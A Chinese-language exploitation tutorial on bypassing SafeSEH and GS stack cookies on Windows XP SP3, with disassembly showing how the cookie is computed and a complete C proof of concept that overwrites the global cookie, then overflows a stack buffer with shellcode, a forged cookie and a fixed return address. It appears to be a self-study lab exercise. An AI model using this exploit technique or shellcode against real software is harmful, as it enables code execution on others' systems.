首先 如果想直接覆盖 一场回调函数去劫持EXE的话 ,SafeSEH会阻止程序去执行;
SafeSEH的原理很简单,就是对要调用的异常回调函数进行一系列对的有效性校验 需要 操作系统XP SP2 及后续版本 和编译器的双重支持
下面说明GS的突破
但感觉还是有点困难: 1 要么程序写了虚函数 2要么程序主动去修改 COOKIE的值· 3 最好的方法直接覆盖 SEH 典型SEH 溢出即可
···感觉不会再爱了
加了GS后 取的COOKIE:
00401000 55 push ebp 00401001 8BEC mov ebp,esp 00401003 81EC E4000000 sub esp,0xE4 00401009 A1 00304000 mov eax,dword ptr ds:[0x403000] //取.data段数据 下面于 ebp 相xor 得到 cookie 0040100E 33C5 xor eax,ebp 00401010 8945 FC mov dword ptr ss:[ebp-0x4],eax 00401013 817D 0C 9599000>cmp dword ptr ss:[ebp+0xC],0x9995 0040101A 0F8D AA000000 jge vs2005TE.004010CA
开始时将 0x403000 处取出COKIE值,然后与EBP做一次异或放入 EBP-4的位置作为 此函数的Security Cookie
函数返回前的校验就是此过程的逆过程,程序将
1 EBP-4的位置取出值,
2 然后与EBP异或
3 最后于 0x00403000处的COOKIE相比较
/*
XP SP3
VS2008 GS保护 禁止优化
*/
#include <stdafx.h>
#include <windows.h>
char shellcode[]=
"x90x90x90x90"
"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
"x53"
"x68x64x61x30x23"
"x68x23x50x61x6E"
"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8"//168
"x90x90x90x90x90x90x90x90x90x90"//注意这里 尽量将90放在后面 放在前面有问题!!!
"x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90"
"x90x90"
"xf4x6fx82x90" //cookie 90826FF4 倒叙 我是通过 编码直接得到 是单个字节xor
"x90x90x90x90" //ebp 原来是 0012ff64
"x94xFEx12x00" //0012FE94 为返回地址
;
void test(char * S,int i,char * src)
{
char dest[200];
if (i<0x9995)
{
char * buf = S+i;
*buf = *src;
*(buf+1) = *(src+1);
*(buf+2) = *(src+2);
*(buf+3) = *(src+3);
strcpy(dest,src);
}
}
int main()
{
char * str = (char *)malloc(0x10000);
test(str,0xFFFF2FB8,shellcode);
//.data 0x403000
//malloc 0x410048 相减 D048
//FFFFFFFF - D048 + 1= FFFF2FB8
}
最后成功:
